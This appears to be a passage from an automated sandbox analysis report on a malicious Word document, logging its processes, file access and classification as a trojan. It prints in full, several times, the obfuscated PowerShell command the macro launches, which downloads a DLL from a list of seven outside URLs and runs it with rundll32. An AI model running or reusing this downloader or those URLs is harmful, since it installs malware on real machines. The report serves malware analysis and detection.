    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762 Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{0BD9A190-463A-4553-980B-C9C874C86222} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@8/18@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_01
    Source: 704.docOLE document summary: title field not present or empty
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE document summary: title field not present or empty
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE document summary: author field not present or empty
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE document summary: edited time not present or 0
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.drOLE document summary: title field not present or empty
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.drOLE document summary: author field not present or empty
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.drOLE document summary: edited time not present or 0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: ~WRF{AF20B67A-97C1-4448-B2F6-AF3A3498FB76}.tmp.0.drInitial sample: OLE indicators vbamacros = False

    Data Obfuscation:

    barindex
    Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
    Source: ~DF0E259767A8C316A9.TMP.0.drStream path 'VBA/cvbku3gakuisdgfilu3gblaw' : High number of string operations
    Suspicious powershell command line foundShow sources
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
    Obfuscated command line foundShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
